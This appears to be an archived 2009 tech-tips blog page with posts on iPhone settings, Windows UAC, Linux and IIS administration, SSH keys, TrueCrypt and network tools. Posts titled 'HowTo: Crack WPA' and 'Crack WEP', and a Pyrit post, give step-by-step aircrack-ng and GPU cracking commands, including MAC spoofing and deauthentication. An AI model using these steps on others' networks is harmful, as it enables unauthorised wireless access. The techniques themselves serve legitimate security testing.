Loading

Monday, November 30, 2009

Add mobile websites to your iPhone's home screen

Many websites and services offer great mobile versions without being packaged in an App Store application. If you want to be able to quickly access these sites from your home screen, follow these steps:
  1. Launch Safari on your iPhone
  2. Browse to a desired mobile site (most sites will automatically redirect you to the mobile version once they determine that you're using an iPhone)
  3. Click the Favorites (+) button at the bottom of Safari
  4. Click "Add to Home Screen"
  5. Type a name for the icon that will appear on your home screen
  6. Click the "Add" button
You will now see an icon on your home screen that will take you directly to the mobile website.

How to Wipe Your iPhone of all Personal Data

Clearing all of the data from your iPhone is simple.
  1. Go to Settings
  2. Tap on General
  3. Scroll all the way down and tap Reset
  4. Choose Erase All Content and Settings
  5. Enter passcode (if you're using one)
  6. Select Erase iPhone (twice), confirming that you REALLY want to lose everything
Make sure you have it plugged in, as the process will take quite a long time, "about an hour" according to the warning. But, believe me, it is time well spent!

Once the process is complete, you'll be left with a "factory fresh" installation of the iPhone OS with no trace of you or your data.

Sunday, November 29, 2009

Disable User Account Control (UAC) on Windows 7 or Vista via Control Panel

This is an easy method that you can use to disable the annoying User Account Control (UAC) from the control panel GUI interface in either Windows 7 or Vista.

See enable or disable UAC from the command line to do it from the trusty command line.

Note: Disabling UAC will lead to a less secure system, so be warned.

Disable UAC on Windows Vista
Open Control Panel, and type “UAC” into the search box. You’ll see a link for “Turn User Account Control (UAC) on or off”:

On the next screen you should uncheck the box for “Use User Account Control (UAC)”, and then click on the OK button.

Unfortunately you will have to reboot your computer before the changes take effect, but you will be all done with annoying prompts.

Disable UAC on Windows 7
Windows 7 makes it much easier to deal with UAC settings, and in fact you don’t have to completely disable UAC if you don’t want to. Just type UAC into Start/Run, Start/Search or Control Panel search boxes.

You can simply drag the slider up or down, depending on how often you want to be alerted.

If you drag it all the way down to the bottom, you’ll have disabled it entirely.

How to kill and logout a user in Linux

You can check who is logged in to a Linux system by executing
who or w commands
and then you can get the user PID
ps aux | grep username or tty
and kill it
kill -KILL PID
or you can use pkill command and kill the user by its username
pkill -KILL -u username
It would be nice to send the users a warning message before logging them out.

Using Remote Desktop for Linux with rdesktop

rdesktop client can be used to connect to Windows Terminal Services for Remote Desktop Protocol (RDP) from Linux machines. The rdesktop client supports all version of Microsoft Windows including the latest, Windows Server 2008 and Windows 7 Operating Systems, and it runs on most unix based platforms as well as other ports.

Visit http://sourceforge.net/projects/rdesktop/ for more information or to download rdesktop.

Download and Install:
  1. wget http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
  2. tar -zxf rdesktop-1.6.0.tar.gz
  3. cd rdesktop-1.6.0
  4. ./configure
  5. make
  6. make install
Basic Usage:
rdesktop -k en-us -a 16 -f -u <username> -p <password> <server>
Command Options Used:
-f switch for full screen mode
-k for keyboard layout on server
-a for color depth
-u for username
-p for password
Note: To exit full screen mode press: CTRL + ALT + Enter

Full Usage Options
Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: enable SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)
There is also a graphical user interface (GUI) that you can use named Terminal Server Client [tsclient]
Visit: http://sourceforge.net/projects/tsclient for more information and to download tsclient.

Disable/Enable User Access Control (UAC) on Windows 7 or Vista from the Command Line

Microsoft introduced User Account Control (UAC) in Windows Vista. UAC enables users to perform common tasks as non-administrators, called standard users in Windows (Vista and Windows 7), and as administrators without having to switch users, log off, or use Run As. A standard user account is synonymous with a user account in Windows XP. User accounts that are members of the local Administrators group will run most applications as a standard user. By separating user and administrator functions while enabling productivity, UAC is an important enhancement for Windows.

Disable UAC from the command line
%systemroot%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Enable UAC from the command line
%systemroot%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
A couple caveats
  1. Must be run with administrative rights.  You could right-click on Command Prompt shortcut and select Run as Administrator.
  2. You may have to reboot for changes to take affect.
You can also enable or disable UAC from the Control Panel.

How to remotely shutdown, restart or logoff a Windows Machine

With these simple commands you can remotely restart, shutdown, log off or even abort a system shutdown on  Local or remote windows machines using Remote Shutdown Tool (shutdown.exe).

The Remote Shutdown Tool can be accessed via a GUI or from the command prompt.

The Remote Shutdown Tool GUI can be accessed by executing:
shutdown.exe /i


Here are the command line options for shutdown.exe:

Usage examples
Restart a network machine and force any running applications to close
shutdown /m \\computername /r /f

Abort a previous shutdown command
shutdown /m \\computername /a
Shutdown a network machine and force any running applications to close
shutdown /m \\computername /s /f
Logoff a machine and force any running applications to close (This cannot be used with /m to specify the target machine)
shutdown computername /l /f
Hibernate a local machine and force any running applications to close
shutdown /m \\computername /h /f
Note: By default the time-out period in previous examples is set to 30 seconds.
Restart a network machine and force any running applications to close giving a reason and set the time-out period to 1 minute (120 sec).
shutdown /m \\computername /r /f /c “Computers will restart in 1 minute, please save any work. System Administrator” /t: 120
Schedule a restart of a machine:
at 23:00 /every:M,T,W,Th,F shutdown /r /m \\computername
Note: this will run on all versions of Windows (2000, 2003, 2008, XP, Vista, Windows 7).

IIS 7 Log Files Default Location

In Internet Information Services 7 Microsoft changed the default log files location.

IIS 7 Log files location
%SystemDrive%\inetpub\logs\LogFiles
IIS 6 Log files location
%windir%\System32\LogFiles

How to Add Quick Launch to Windows 7 Task Bar

By default Windows 7 does not display quick launch on the taskbar like Windows XP and Vista.

How to Enable Quick Launch in Windows 7
  1. Right-click on taskbar.
  2. From Toolbars Menu select New Toolbar.
  3. Under Folder add: %appdata%\Microsoft\Internet Explorer\Quick Launch then press Select Folder.
How to Unlock the Taskbar
  1. Unlock the taskbar by right-clicking on taskbar and select unlock the taskbar.
  2. To lock, do the same but select lock the taskbar.
Taskbar options
In Windows 7 quick launch you can choose whether to display the title and to show text or not.  To change these settings unlock the taskbar, right-click in the quick launch area of the taskbar and toggle Show Text and Show Title as desired.

BackTrack 4 PreRelease Hard Disk Install

Since BackTrack 4 Pre-Release does not contain an installer you can follow these steps to install BT4 quickly and easily. The assumption is that you are installing BT4 on an empty disk (/dev/sda in this tutorial).

Boot to BT4 DVD (download BackTrack 4 ISO - make sure to get the BT 4 Beta and not the BT4 Pre Release). Enter commands in bold.

1. Start by creating 3 partitions on the disk, one each for boot, swap and root. Note, since your disk size is probably different than mine the number of cylinders will likely be different.
root@bt:~# fdisk /dev/sda

The number of cylinders for this disk is set to 19457.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-19457, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-19457, default 19457): +128M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (18-19457, default 18): <enter>
Using default value 18
Last cylinder, +cylinders or +size{K,M,G} (18-19457, default 19457): +1024M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 3
First cylinder (150-19457, default 150): <enter>
Using default value 150
Last cylinder, +cylinders or +size{K,M,G} (150-19457, default 19457): +16000M

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
root@bt:~#
2. Format the file systems, mount them and copy over the directory structure. Chroot into new environment.
root@bt:~# mke2fs /dev/sda1
root@bt:~# mkswap /dev/sda2
root@bt:~# swapon /dev/sda2
root@bt:~# mkreiserfs /dev/sda3
root@bt:~# mkdir /mnt/bt
root@bt:~# mount /dev/sda3 /mnt/bt/
root@bt:~# mkdir /mnt/bt/boot
root@bt:~# mount /dev/sda1 /mnt/bt/boot
root@bt:~# cp --preserve -R /{bin,dev,home,pentest,root,usr,boot,etc,lib,opt,sbin,var} /mnt/bt/
root@bt:~# mkdir /mnt/bt/{mnt,tmp,proc,sys}
root@bt:~# chmod 1777 /mnt/bt/tmp/
root@bt:~# mount -t proc proc /mnt/bt/proc
root@bt:~# mount -o bind /dev /mnt/bt/dev/
root@bt:~# chroot /mnt/bt/ /bin/bash
3. Configure /etc/lilo.conf to reflect your setup.
lba32
boot=/dev/sda
root=/dev/sda3

# bitmap=/boot/sarge.bmp
# bmp-colors=1,,0,2,,0
# bmp-table=120p,173p,1,15,17
# bmp-timer=254p,432p,1,0,0
# install=bmp

# delay=20

prompt
timeout=50

# map=/boot/map

vga=0x317

image=/boot/vmlinuz
label="BT4"
read-only
initrd=/boot/splash.initrd
append=quiet
4. Fix first line in /etc/fstab, and remove unnecessary mount lines. Add the swap partition to the fstab so it gets loaded at boot time. Your fstab should look similar to this:
/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0
proc /proc proc defaults 0 0 # AutoUpdate
sysfs /sys sysfs defaults 0 0 # AutoUpdate
devpts /dev/pts devpts gid=5,mode=620 0 0 # AutoUpdate
tmpfs /dev/shm tmpfs defaults 0 0 # AutoUpdate
5. Execute lilo and reboot!
root@bt:/# lilo -v
LILO version 22.8, Copyright (C) 1992-1998 Werner Almesberger
Development beyond version 21 Copyright (C) 1999-2006 John Coffman
Released 19-Feb-2007, and compiled at 14:08:06 on May 15 2008
Ubuntu

Reading boot sector from /dev/sda
Using MENU secondary loader
Calling map_insert_data

Boot image: /boot/vmlinuz
Mapping RAM disk /boot/splash.initrd
Added BT4 *

Writing boot sector.
Backup copy of boot sector in /boot/boot.0800
root@bt:/# exit
exit
root@bt:~# reboot
BackTrack links

HowTo: Crack WPA with Backtrack 3



This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

HowTo: Crack WEP with BackTrack 3



This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)

How to Install and Configure IIS 7 FTP Publishing Service

The new FTP Publishing Service 7.5 has been rewritten for Windows Server 2008 and lot of new futures and additions included. (Integration with IIS 7, FTP over SSL (from v7.0), Improved Logging, etc..)

Prerequisites
1. Internet Information Services 7.0 installed.
2. Windows Server 2008 or Vista.
3. Download FTP Publishing Service 7.5
4. Create a folder for FTP Publishing Service and allow Full access for Administrators
  • mkdir “c:\inetpub\ftproot\ftp.mydomain.com”
  • cacls “c:\inetpub\ftproot\ftp.mydomain.com” /G administrators:F /T /E
In case we want to add access to specific backup user we can use the following command”
  • cacls “c:\inetpub\ftproot\ftp.mydomain.com” /G username:F /T /E
Permissions:
R  Read
W  Write
C  Change (write)
F  Full control
Installation
Before installing FTP Publishing Service 7.5 over IIS 7.0 be sure that you uninstall any previous versions of FTP Publishing Service.

  1. When the installation program of Microsoft FTP Service for IIS 7.0 begins, click Next.
  2. Accept the End-User License Agreement and click Next.
  3. Select the features you want to be installed and click Next.
  4. Click Install to begin the installation.
  5. At the end click Finish.

Creating the Certificate
After the installation finishes we open Internet Information Services 7.0  Manager and we select Server Certificates to create a self-signed SSL certificate. Another option is to create a certificate request to process with a 3rd party SSL provider which is recommended for production systems as they are from a trusted root.

Server Certificates

Click on Create Self-Signed Certificate…

Create a self-signed certificate

Specify a certificate name and click OK:

Specify certificate name


Creating the FTP Site
Right click the Sites node in the tree and click Add FTP Site…

Add FTP Site...

On the Add FTP Site wizard add the FTP site name and select the path we created in the prerequisites and click Next.

Add FTP Site Wizard

On the next page of the wizard we click the Require SSL option and we choose our SSL Certificate then we click Next.

Binding and SSL Settings

On the next page of the wizard we select Basic for Authentication and on Allow access to we select specified users and we define our backup ftp account with read and write permissions then we click on Finish. In case we want to allow anonymous ftp connections select Anonymous authentication and on Permissions we select the Read.

Authentication and Authorization Information


Configure the Firewall
If we are behind a firewall we should configure the FTP Firewall Support under Internet Information Services Manager and configure our firewall ports to accept passive connections on the ports we specify. In case we want to use dynamic port range under Data Channel Port Range we enter port range “0-0?.

FTP Firewall Support


Configure the FTP Client (FileZilla for example)
Configure FTP Client to connect to our FTP Site using FTP over explicit TLS/SSL.

FTP Client Settings


Troubleshooting
In case you get “534 Local policy on server does not allow TLS secure connections.” error this is because we need to select an SSL certificate at the Server Level.

FTP SSL Settings Server Level
FTP SSL Settings Certificate Selection

Saturday, November 28, 2009

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit - How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff.  Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock.

How to
Listing available cores
pyrit list_cores


Determining performance of cores
pyrit benchmark


Create a new ESSID
pyrit -e Linksys create_essid
Import list of passwords
pyrit -f dict.txt import_passwords

 Start Batch Processing
pyrit batch


Cracking WPA/WPA2-PSK using pyrit/coWPAtty
pyrit -e “Linksys” -f dict.txt passthrough | cowpatty -d – -r wpa2handshake.cap -s “Linksys“
“-e” ESSID for the command
“-f” Filename for the command (’-’ is stdin/stdout)
“-d” Hash file
“-” Accept words on stdin
“-r” Packet capture file
“-s” Network SSID

Thursday, November 26, 2009

Root Access Email Alert


Get notified when a user logs in with root privileges.

1) Edit .bashrc under /root to get notified by email when someone logs in as root
2) Add the following:
echo ‘ALERT – Root Shell Access (Server Name) on:’ `date` `who` | mail -s “Alert: Root Access from `who | cut -d”(” -f2 | cut -d”)” -f1`” youremail@domain.com

TrueCrypt - Free Open Source Industrial Strength Encryption

TrueCrypt provides a solution for encrypting sensitive data - everything from portable, mountable volumes to entire hard disks.  Encrypting your data renders that access useless, even if your computer or your thumbdrive falls into the wrong hands.

And TrueCrypt makes it not only easy, but nearly un-crackable.  TrueCrypt is both open source and FREE.

There are two approaches to using TrueCrypt:
  • Whole Drive Encryption - you can use TrueCrypt to encrypt your entire hard disk, including your boot partition. In order to boot the machine, you must first supply your pass phrase to enable decryption. Once booted, data is automatically and transparently encrypted and decrypted as it travels to and from the disk. Once your machine is turned off, the data is unrecoverable without knowing the pass phrase.
  • Container Encryption - with this approach you create a single file on your computer's hard drive that is encrypted. You then "mount" that file using TrueCrypt, supplying the correct pass phrase to decrypt it after which the contents of that file appear as another drive on your system. Reading from and writing to that "drive" automatically and transparently decrypts and encrypts the data. Once the drive is unmounted, the data is once again unrecoverable without knowing the pass phrase.

TrueCrypt is both simple and elegant.

Most users prefer container based encryption for its portability, and for the fact that you need only mount the encrypted drive when you need access. You could keep personal information in a TrueCrypt container that could be regularly copied between machines, onto a thumbdrive, and even backed up to the Internet. When you need to access the encrypted data, simply mount it, specify your pass phrase to unlock it, and use the files that are stored within it.

TrueCrypt is not tied to any one platform, your user account or anything else; just the pass phrase. In fact, you can copy your encrypted file to another machine entirely and mount it with TrueCrypt. Even using other operating systems such as Mac or Linux.

Here are a couple of important caveats:
  • Encryption does not make a bad pass phrase any more secure. If you choose an obvious pass phrase, an attack can certainly be mounted that could unlock your encrypted volume. This is why we talk about pass phrase instead of password. Use a multi-word phrase that you can remember to be the key to your encrypted data, and it'll be much, much more difficult to break.
  • An encrypted volume does you no good if the files you care about are also elsewhere on your machine.
  • Make sure you have secure backups, updated regularly. Preferably keep them UNencrypted, but secure in some other way, in case you lose your encrypted volume or forget your pass phrase. If you've chosen a good passphrase, without it the data is not recoverable.

TrueCrypt is FREE open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

TrueCrypt Features:







Data encryption is an important part of an overall security strategy. TrueCrypt can be a key part of that strategy.

Download TrueCrypt.

How to create and use Public Keys with SSH

SSH and SFTP Public Key Authentication requires that you create a public/private key pair. In this howto we will look at how to create then use those keys.

SSH (Secure Shell) and SFTP (Secure FTP) support a very strong security model that can be used instead of the normal username and password authentication scheme. It uses public key cryptography to create a different, and more secure approach to authenticating your identity and rights to access a server or resource.

Essentially you will generate a public and private key pair. The public key will be placed on the server by your system administrator, giving you access. You will keep the file containing the private key in a safe place. You'll login by simply by providing that private key file to your SSH or SFTP supporting client.

The private key is just that - private. You may put a password on it, but you don't have to. Without a password, all you need is the file in order to login. Or, to put it more clearly, all anyone needs is that file to login as you. Obviously if you password protect the file, then you'll need both the file, and the password to unlock it. In that case, logging in is very similar to what you do today: specify a user name, and a password to unlock your key file.

Instructions are included here for the following tools, which are known to work with this technique:

SSH Clients
                                   SFTP Clients
PuTTY
SecureCRT
                                   PSFTP
                                   Webdrive
                                   WS_FTP

Instructions for these tools are not provided here, but they either claim or have been confirmed to have the appropriate support:
SSH Clients
                           SFTP Clients
Tera Term Pro
                           CuteFTP Professional
                           WinSCP
Other tools may also work. The key terminology to look for is "SSH" or "SFTP" and "Public Key Authentication".

Generating Your Keys

In general it's best to create your own key. That way you control what happens to your private key.

PuTTYgen

PuTTY is a free SSH client that includes a tool for generating keys, called PuTTYgen. PuTTY is my preferred SSH client.

Run PuTTYgen and click the "Generate" button.




Follow the directive to move the mouse around to generate randomness, which is a key component of public key cryptography. Once that's done, you should do the following:
  • Specify a passphrase. Technically this is optional, but if you omit the passphrase, then anyone who happens to get ahold of your private key file can login as you. You may have enough security in place where this is not an issue. If you do specify a passphrase, you'll need to enter it when you login, pretty much as a normal login.
  • Press the Save Public Key button to save the public key. I recommend saving as your name ".pub". For example I would save "powercram.pub".
  • Press the Save Private Key button to save your private key. This saves the private key in PuTTY's own format, a ".ppk" file. So, "name.ppk" might be appropriate.
  • I also recommend hitting the Conversions menu, and then Export Openssh key, and saving that to "name.key". This format will allow you to use your private key with other applications besides PuTTY.

SecureCRT

SecureCRT is a stand-alone SSH client.
To create a public key with SecureCRT, click the Tools menu, Create Public Key... option to begin the wizard.  Select RSA as the key type. Enter (or not) an appropriate passphrase to protect your private key. A default key length of 1024 is sufficient. Allow SecureCRT to save the key, noting the location. It may ask if you want to use this as your global Public Key, and you can safely say "yes".

WS_FTP

In WS_FTP, click Tools, Options, and then click on SSH, Client Keys:



Press Create, and step through the wizard. The key type should be RSA, and the default size of 1024 is sufficient.  Once the key has been created and shows up in the list, click on it, and then click on Export, to export your public key.

Using Your Keys - SSH

Once your keys are generated, and the public key installed on the server, you'll need to specify the private key to your SSH client in order to log in.

PuTTY

There are at least two approaches to using Public/Private keys with PuTTY. When you launch PuTTY without any arguments, you get its standard configuration dialog, into which you can enter the name of the server you want to connect to:



On the left hand side is a tree view of various options. Underneath Connection, SSH, click on Auth and the dialog will include a field "Private key file for authentication":



Specify the location of the ".ppk" file that you generated with PuTTYgen. When you connect, if your private key is passphrase protected, you'll be asked for the passphrase.  The other approach is to simply create shortcuts for the various servers I connect to regularly, and specify the location of the private key on the command line. For example:
C:\path\PUTTY.EXE -i c:\admin\powercram.ppk admin@server.com
That, as a desktop shortcut, or item on a Windows menu, connects to the named server using the specified account name "admin", and uses the private key found in "c:\admin\powercram.ppk" to authenticate.

SecureCRT

SecureCRT has several paths to a connection dialog, but we'll use "Quick Connect" for our example. Click the Quick Connect Icon:



Make sure that protocol is set to SSH2, and enter your host and username. In Authentication, UNcheck everything except PublicKey. Then click on that, and click Properties.



Typically you don't need to do anything, but this dialog specifies the location of your identity file (aka Private Key).  Assuming that your public key has been placed on the server for your account, you should now be able to connect.

Using Your Keys - SFTP

Secure FTP, or FTP, is really just using SSH technology to provide FTP-like functionality. Since it's using SSH, the keys you've generated and are using for your SSH authentication work with many SFTP applications as well.

WebDrive

Webdrive is an FTP/SFTP service for Windows that allows you to treat an FTP or SFTP connection like another drive mounted on your system. Uploading and downloading then become simple Windows file copy operations.  In Webdrive, you'll need to load your private key, and then specify it in the configuration for a specific SFTP connection.  The Certificates tab of Webdrive's Settings dialog, has a Hostkey Managemet button.  Push that, and you'll get the host key management dialog, and on that you'll find an Import button. Press that to import your public and private keys:



Specify the ".pub" key for the public key you generated earlier. The private key should also be specified, and would be the ".key" file. If you passphrase protected your key file, you can specify that here as well. Give it a recognizable name.  The second step, then, takes us back to the Webdrive main window.

Click on a connection (or create a new one). In the Properties for that connection, on the SFTP tab will be a setting Enable client hostkey support for this site:



Here you'll find a dropdown list of the keys you imported above, and a place to enter the password, if any, to access that key.  Once completed, Webdrive should now be able to connect to your public key authenticated site.

WS_FTP

Having created a key pair already in WS_FTP, using it is simply a matter of defining your connection to use it.
When you create a site, specify its connection type as SFTP/SSH. Specify a user name, but leave your password blank. At the end of the wizard, click on the Advanced button, this will allow you to edit the connection, and is the equivalent to editing an existing connection.

Click on the SSH item on the left, and the dropdown list that results should allow you to select the key pair that you created earlier.  Assuming that the public key you exported and sent to your system administrator has been installed on the server, you should now be able to connect.

psftp

PSFTP is command line FTP program that is distributed with PuTTY. More importantly, it supports public key SFTP by using the ".ppk" file that you created for PuTTY above. Connecting using a public key is simply a different set of comment line options:
psftp -l username -2 -i keys.ppk remotehost
-l username specifies your username on the remote host; -2 indicates that PSFTP should use SSH protocol version 2; -i keys.ppk specifies the location of your private key as created with PuTTYgen; remotehost is the name of the remote host you're connecting to.

Tuesday, November 24, 2009

How do I Drop or block attackers IP with null routes?

Someone might attack on your system. You can drop attacker IP using IPtables. However, you can use route command to null route unwanted traffic. A null route (also called as blackhole route) is a network route or kernel routing table entry that goes nowhere. Matching packets are dropped (ignored) rather than forwarded, acting as a kind of very limited firewall. The act of using null routes is often called blackhole filtering.

You can nullroute (like some time ISP do prevent your network device from sending any data to a remote system.) stopping various attacks coming from a single IP (read as spammers or hackers):

Nullroute IP using route command

Suppose that bad IP is 65.21.34.4, type following command at shell:

# route add 65.21.34.4 gw 127.0.0.1 lo

You can verify it with following command:
# netstat -nr

OR
# route -n

You can also use reject target (thanks to Gabriele):
# route add -host IP-ADDRESS reject
# route add -host 64.1.2.3 reject


To confirm the null routing status, use ip command as follows:
# ip route get 64.1.2.3

Output:
RTNETLINK answers: Network is unreachable

Drop entire subnet 192.67.16.0/24:
# route add -net 192.67.16.0/24 gw 127.0.0.1 lo

You can also use ip command to null route network or ip, enter:
# ip route add blackhole 202.54.5.2/29
# route -n

How do I remove null routing? How do I remove blocked IP address?

Simple use router delete command,
# route delete 65.21.34.4

Friday, November 20, 2009

"The Dude" Network Monitor for Windows

The Dude network monitor is an application by MikroTik which can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and layout a map of your networks, monitor services of your devices and alert you in case some service has problems.
  • The Dude is free of charge!
  • Auto network discovery and layout
  • Discovers any type or brand of device
  • Device, Link monitoring, and notifications
  • Includes SVG icons for devices, and supports custom icons and backgrounds
  • Easy installation and usage
  • Allows you to draw your own maps and add custom devices
  • Supports SNMP, ICMP, DNS and TCP monitoring for devices that support it
  • Individual Link usage monitoring and graphs
  • Direct access to remote control tools for device management
  • Supports remote Dude server and local client
  • Runs in Linux Wine environment, MacOS Darwine, and Windows
  • Best price/value ratio compared to other products (free of charge)

Thursday, November 19, 2009

Microsoft IIS W3C Extended Log Format

This log file format is used by used by Microsoft Internet Information Server (IIS) 4.0, 5.0, 6.0 and 7.0.

A log file in the extended format contains a sequence of lines containing ASCII characters. Each line may contain either a directive or an entry. Entries consist of a sequence of fields relating to a single HTTP transaction. Fields are separated by white space. If a field is unused in a particular entry dash "-" marks the omitted field. Directives record information about the logging process itself.

Lines beginning with the # character contain directives. The following directives are defined:


Version: .
The version of the extended log file format used. This draft defines version 1.0.
Fields: [...]
lists a sequence of field identifiers specifying the information recorded in each entry.
Software: string
Identifies the software which generated the log.
Start-Date:
The date and time at which the log was started.
End-Date:
The date and time at which the log was finished.
Date:
The date and time at which the entry was added.
Remark:
Comment information. Data recorded in this field should be ignored by analysis tools.
The directives Version and Fields are required and should precede all entries in the log. The Fields directive specifies the data recorded in the fields of each entry.

W3C Extended Logging Field Definitions

Prefix
Meaning
s-
Server actions.
c-
Client actions.
cs-
Client-to-server actions.
sc-
Server-to-client actions.


Field
Appears As
Description
Date
date
The date that the activity occurred.
Time
time
The time that the activity occurred.
Client IP Address
c-ip
The IP address of the client that accessed your server.
User Name
cs-username
The name of the authenticated user who accessed your server. This does not include anonymous users, who are represented by a hyphen (-).
Service Name
s-sitename
The Internet service and instance number that was accessed by a client.
Server Name
s-computername
The name of the server on which the log entry was generated.
Server IP Address
s-ip
The IP address of the server on which the log entry was generated.
Server Port
s-port
The port number the client is connected to.
Method
cs-method
The action the client was trying to perform (for example, a GET method).
URI Stem
cs-uri-stem
The resource accessed; for example, Default.htm.
URI Query
cs-uri-query
The query, if any, the client was trying to perform.
Protocol Status
sc-status
The status of the action, in HTTP or FTP terms.
Win32® Status
sc-win32-status
The status of the action, in terms used by Microsoft Windows®.
Bytes Sent
sc-bytes
The number of bytes sent by the server.
Bytes Received
cs-bytes
The number of bytes received by the server.
Time Taken
time-taken
The duration of time, in milliseconds, that the action consumed.
Protocol Version
cs-version
The protocol (HTTP, FTP) version used by the client. For HTTP this will be either HTTP 1.0 or HTTP 1.1.
Host
cs-host
Displays the content of the host header.
User Agent
cs(User-Agent)
The browser used on the client.
Cookie
cs(Cookie)
The content of the cookie sent or received, if any.
Referrer
cs(Referer)
The previous site visited by the user. This site provided a link to the current site.
The following is an example of a record in the extended log format that was produced by the Microsoft Internet Information Server (IIS):
--------------------------------------------------------------------------------

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-11-19 19:42:21
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /index.html - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 200 0 0 366 399 265
2009-11-19 19:42:21 W3SVC874815883 IP-0AF98AC2 10.249.138.194 GET /favicon.ico - 80 - 67.212.138.161 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.2;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+GTB5+(.NET+CLR+3.5.30729) - - powercram.com 404 0 2 1836 380 0

BgInfo - create a Windows desktop wallpaper full of useful information


 Download BgInfo (387 KB)

Introduction

How many times have you walked up to a system in your office and needed to click through several diagnostic windows to remind yourself of important aspects of its configuration, such as its name, IP address, or operating system version If you manage multiple computers you probably need BGInfo. It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more. You can edit any field as well as the font and background colors, and can place it in your startup folder so that it runs every boot, or even configure it to display as the background for the logon screen.

Because BGInfo simply writes a new desktop bitmap and exits you don't have to worry about it consuming system resources or interfering with other applications.

Sysinternals BgInfo

Installation and Use

See this Windows IT Pro Magazine Power Tools article for a primer on using BgInfo. If you have questions or problems, please visit the Sysinternals BgInfo Forum.

By placing BGInfo in your Startup folder, you can ensure that the system information being displayed is up to date each time you boot. Once you've settled on the information to be displayed, use the command-line option /timer:0 to update the display without showing the dialog box.
You can also use the Windows Scheduler to run BGInfo on a regular basis to ensure long-running systems are kept up to date.

If you create a BGInfo configuration file (using the File|Save Settings menu item) you can automatically import and use those settings on other systems by adding the /I or /iq command line option.

Using BgInfo

When you run BGInfo it shows you the appearance and content of its default desktop background. If left untouched it will automatically apply these settings and exit after its 10 second count-down timer expires.
Selecting any button or menu item will disable the timer, allowing you to customize the layout and content of the background information.

If you want BGInfo to edit or use a configuration stored in a file (instead of the default configuration which is stored in the registry) specify the name of the file on the command line:

BGInfo MyConfig.bgi

Appearance Buttons

Fields: Selects what information appears on the desktop, and the order in which it is displayed. For networking fields (NIC, IP, MAC, etc.) a separate entry is created for each network card on the system. Use the Custom button to add special information you define yourself.
Background: Selects the color and/or wallpaper to use for the background. If you select the Copy existing settings option then BGInfo will use whatever information is currently selected by the logged on user. This option allows end users to personalize their desktop while still displaying the BGInfo information.
